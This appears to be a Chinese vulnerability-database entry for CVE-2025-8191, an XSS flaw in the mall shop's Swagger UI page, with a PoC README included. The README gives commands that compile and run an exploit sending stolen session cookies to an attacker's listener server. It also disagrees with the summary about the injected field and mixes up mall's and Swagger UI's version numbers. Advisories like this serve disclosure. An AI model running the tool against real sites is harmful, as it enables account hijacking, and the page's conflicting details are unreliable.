关联漏洞
标题:
mall 代码注入漏洞
(CVE-2025-8191)
描述:mall是macro个人开发者的一套电商系统,包括前台商城系统及后台管理系统。 mall 1.0.3及之前版本存在代码注入漏洞,该漏洞源于文件/swagger-ui/index.html中参数configUrl导致跨站脚本。
描述
A repository containing a PoC exploit for CVE‑2025‑8191 in Swagger UI, leveraging XSS injection to exfiltrate session cookies.
介绍
# CVE-2025-8191 – Swagger UI XSS Injection
## Description :
This repository contains a Proof‑of‑Concept (PoC) exploit for CVE‑2025‑8191, a vulnerability found in Swagger UI.
The vulnerability allows Cross‑Site Scripting (XSS) injection in the “description” field, leading to remote script execution under Swagger UI versions ≤ 1.0.3.
## References :
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-8191
## Usage :
```
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
```
Replace http://target.com with the target Swagger UI URL, and http://yourserver.com with your HTTP listener for exfiltration.
## Disclaimer :
This code is for educational and security‑research purposes only. Do NOT use it on systems for which you do not have explicit permission. The author is not responsible for any misuse.
## License :
MIT License
文件快照
[4.0K] /data/pocs/4b613c83c4f7aebb281601204d9334e00c9c0197
├── [ 16K] exploit.c
├── [1.0K] LICENSE
└── [ 946] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。